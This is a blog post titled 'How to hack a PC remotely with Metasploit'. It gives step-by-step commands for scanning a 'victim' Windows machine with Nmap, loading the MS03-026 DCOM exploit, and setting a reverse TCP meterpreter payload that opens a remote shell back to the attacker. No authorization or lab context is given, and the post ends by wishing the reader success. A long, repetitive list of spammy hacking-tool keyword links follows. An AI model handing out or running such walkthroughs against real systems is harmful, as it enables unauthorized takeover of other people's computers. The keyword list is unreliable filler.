Sunday, August 23, 2020

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
More info
  1. Hack And Tools
  2. Hacker
  3. Hacking Tools Github
  4. Hack And Tools
  5. Pentest Tools For Android
  6. Pentest Tools For Ubuntu
  7. Hack Rom Tools
  8. Hacker Tools For Windows
  9. Pentest Tools Free
  10. Pentest Tools Nmap
  11. New Hack Tools
  12. Beginner Hacker Tools
  13. Hacker Tools For Mac
  14. Pentest Tools Windows
  15. Hacking Tools Github
  16. What Are Hacking Tools
  17. Bluetooth Hacking Tools Kali
  18. Hacking Tools Name
  19. Hak5 Tools
  20. What Are Hacking Tools
  21. Hacker Tools For Pc
  22. Pentest Reporting Tools
  23. Hack Website Online Tool
  24. Hacking Tools For Windows Free Download
  25. Hacks And Tools
  26. Hacker Tools For Windows
  27. Pentest Tools Android
  28. Hacker Tools Hardware
  29. Best Pentesting Tools 2018
  30. Hacker
  31. Hack Tools Mac
  32. Hackers Toolbox
  33. Hacker Tools For Pc
  34. New Hacker Tools
  35. Hack App
  36. Blackhat Hacker Tools
  37. Wifi Hacker Tools For Windows
  38. Hacker Tools 2019
  39. Hacking Tools For Kali Linux
  40. Github Hacking Tools
  41. Blackhat Hacker Tools
  42. Hacking Tools Download
  43. Hackrf Tools
  44. Tools For Hacker
  45. Blackhat Hacker Tools
  46. Pentest Tools For Android
  47. Pentest Tools Online
  48. Pentest Tools Free
  49. Pentest Tools Bluekeep
  50. Hacking Tools Free Download
  51. Android Hack Tools Github
  52. Nsa Hacker Tools
  53. Hacker Tools For Mac
  54. Install Pentest Tools Ubuntu
  55. Hacking Tools Kit
  56. Hacking Tools For Mac
  57. Pentest Tools Subdomain
  58. Termux Hacking Tools 2019
  59. Hacking Apps
  60. Hacker Tools For Ios
  61. Hacker Tools Apk Download
  62. Best Pentesting Tools 2018
  63. Pentest Tools Find Subdomains
  64. How To Hack
  65. Tools Used For Hacking
  66. Hacking Tools 2020
  67. Hacking Tools Pc
  68. Pentest Tools
  69. Hacker Techniques Tools And Incident Handling
  70. Hacking Tools Github
  71. Top Pentest Tools
  72. Hack Tools For Mac
  73. Hacking Tools For Games
  74. Hacker Tools 2020
  75. Black Hat Hacker Tools
  76. Tools Used For Hacking
  77. How To Hack
  78. Hacking Tools Mac
  79. Pentest Tools Windows
  80. Pentest Tools Bluekeep
  81. Free Pentest Tools For Windows
  82. Hacker Tools List
  83. Pentest Tools Subdomain
  84. Hacking Tools Kit
  85. Pentest Tools Subdomain
  86. Pentest Reporting Tools
  87. Hacker Tools Github
  88. Best Hacking Tools 2019
  89. Hacker Tools
  90. Growth Hacker Tools
  91. Pentest Tools Android
  92. Hacker Tools Software
  93. Pentest Tools Tcp Port Scanner
  94. Hacking Tools For Windows Free Download
  95. How To Install Pentest Tools In Ubuntu
  96. Hack Tools
  97. Hacker Tools Software
  98. Underground Hacker Sites
  99. Hacking Tools Kit
  100. Pentest Tools For Ubuntu
  101. Hack Tools Mac
  102. Hacking Tools For Kali Linux
  103. Best Pentesting Tools 2018
  104. Hacking Tools For Beginners
  105. Hacker Tools Online
  106. Hack Tools Pc
  107. Easy Hack Tools
  108. Hackers Toolbox
  109. Hacking Tools Name
  110. Hacker
  111. Hacking Tools Usb
  112. Hacking Tools Windows
  113. Hack Tools Mac
  114. Pentest Box Tools Download
  115. Hacking Tools 2019
  116. Pentest Tools Nmap
  117. Pentest Tools Apk
  118. Nsa Hack Tools Download
  119. Hacker Hardware Tools
  120. Pentest Tools Bluekeep
  121. Hacker Security Tools
  122. Hacking Tools Free Download
  123. Pentest Tools Open Source
  124. Hackers Toolbox
  125. Pentest Recon Tools
  126. Hack Tools For Pc
  127. Pentest Tools Port Scanner
  128. Free Pentest Tools For Windows
  129. Pentest Tools Port Scanner
  130. Pentest Tools Tcp Port Scanner
  131. Wifi Hacker Tools For Windows
  132. Best Hacking Tools 2020
  133. Pentest Tools Online
  134. Hacker
  135. Hacking Tools For Windows 7
  136. Hacker Tools Online
  137. Hacker Tools 2020
  138. Pentest Box Tools Download
  139. Pentest Recon Tools
  140. Pentest Tools Online
  141. Hack Tools For Ubuntu
  142. Hack Tools
  143. Pentest Automation Tools
  144. Pentest Tools
  145. Pentest Tools Bluekeep
  146. Hack Tools Mac
  147. Game Hacking
  148. Beginner Hacker Tools
  149. Hack Tools For Windows
  150. Hacker Tools For Windows
  151. Hacker Tools For Windows
  152. Hacking Tools Kit
  153. Hacker Tools 2020
  154. Pentest Automation Tools
  155. Hacking Tools Github
  156. Hacking Tools Hardware
  157. Kik Hack Tools
  158. Hacking Tools Usb
  159. Hack Website Online Tool
  160. Kik Hack Tools
  161. Pentest Tools Url Fuzzer
  162. How To Hack
  163. Pentest Tools For Android
  164. Hack Website Online Tool
  165. Install Pentest Tools Ubuntu
  166. Hacking Tools Pc
  167. Nsa Hack Tools
  168. Pentest Tools Open Source
  169. Underground Hacker Sites

No comments:

Post a Comment